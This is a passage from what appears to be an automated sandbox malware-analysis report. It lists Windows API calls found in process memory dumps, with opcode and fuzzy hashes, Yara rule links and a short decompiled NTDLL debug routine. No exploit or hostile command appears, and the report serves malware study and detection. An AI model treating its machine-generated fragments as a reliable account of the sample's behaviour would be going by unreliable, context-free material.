                            • RtlAllocateHeap.NTDLL(00DD3526,?,00DD3C9F,00DD3C9F,?,00DD3526,?,?,?,?,?,00000000,00000000,?), ref: 00DD84CD
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                            • Instruction ID: ddb3382e2379569e65a2bee29a67a7db2b3efe78ddd2525594245fc458b1783a
                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                            • Instruction Fuzzy Hash: 6FE012B1200208ABDB14EF99CC41EA777ADEF88650F118559BA085B282CA30F9108AB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DD8640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule
                            APIs
                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00DCCFB2,00DCCFB2,?,00000000,?,?), ref: 00DD8670
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: LookupPrivilegeValue
                            • String ID:
                            • API String ID: 3899507212-0
                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                            • Instruction ID: 474bc18020f0f3be657e5de7c3a5265238cb3af09da99965a3882dda4f5810e2
                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                            • Instruction Fuzzy Hash: A3E01AB12002086BDB10DF49CC85EE737ADEF88650F018155BA0857281C930E8108BF5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DCD417, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,00DC7C73,?), ref: 00DCD44B
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: 89670eb379ca35015a9b393f925864e75855dc6f41c8c338e29b46e926788228
                            • Instruction ID: 65b161c0abea5d5c8a662ea9873123b705c1c53e9e74e0e5284193c379024d11
                            • Opcode Fuzzy Hash: 89670eb379ca35015a9b393f925864e75855dc6f41c8c338e29b46e926788228
                            • Instruction Fuzzy Hash: B3D02EBA7402007BE600AFA4CC03F22329AAB98B14F0A0034FA08EA3C3EA28D4008135
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00DCD420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNELBASE(00008003,?,?,00DC7C73,?), ref: 00DCD44B
                            Memory Dump Source
                            • Source File: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, Offset: 00DC0000, based on PE: false
                            Yara matches
                            Similarity
                            • API ID: ErrorMode
                            • String ID:
                            • API String ID: 2340568224-0
                            • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                            • Instruction ID: 09fa2b50809b99974cd621637f6ffca8d3150e34a8d64557e83c97a3f9d298c1
                            • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                            • Instruction Fuzzy Hash: DDD05E617503042AE610BAA49C03F26728D9B44B00F494074FA48973C3D964E5004172
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0536967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 0d87bd226b9819389fd9e85ec7275f9037a9f2940853ca3c9c6c618015372def
                            • Instruction ID: 406a3a6c2b26655b08bf6bbbd92b9ec22bfdbea2331fd106c52b35e0b9b3bcec
                            • Opcode Fuzzy Hash: 0d87bd226b9819389fd9e85ec7275f9037a9f2940853ca3c9c6c618015372def
                            • Instruction Fuzzy Hash: F0B09B72D015C5C5E611D7604708B2779117BD0751F56C465D1060641E477CC091F5B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 053BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                            Download Yara Rule
                            C-Code - Quality: 53%
                            			E053BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0536CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E053B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E053B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                            0x053bfdda
                            0x053bfde2
                            0x053bfde5
                            0x053bfdec
                            0x053bfdfa
                            0x053bfdff
                            0x053bfe0a
                            0x053bfe0f
                            0x053bfe17
                            0x053bfe1e
                            0x053bfe19
                            0x053bfe19
                            0x053bfe19
                            0x053bfe20
                            0x053bfe21
                            0x053bfe22
                            0x053bfe25
                            0x053bfe40

                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 053BFDFA
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 053BFE01
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 053BFE2B
                            Memory Dump Source
                            • Source File: 00000010.00000002.510146326.0000000005300000.00000040.00000001.sdmp, Offset: 05300000, based on PE: true
                            • Associated: 00000010.00000002.510915054.000000000541B000.00000040.00000001.sdmp Download File
                            • Associated: 00000010.00000002.510936884.000000000541F000.00000040.00000001.sdmp Download File
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                            • API String ID: 885266447-3903918235
                            • Opcode ID: fb36f2a01cef2ef721be9437831afdb6b0ad89d2e2a5adb3994cb19d213f780d
                            • Instruction ID: a39b8ea548e4cd029f3a0b7b576127e3151daa05eb73919651fafffc9e325af8
                            • Opcode Fuzzy Hash: fb36f2a01cef2ef721be9437831afdb6b0ad89d2e2a5adb3994cb19d213f780d
                            • Instruction Fuzzy Hash: 6CF0C236740201BBE6251A55DC06E63BB6AEB45730F144214F728569D1EAA3F83096A4
                            Uniqueness

                            Uniqueness Score: -1.00%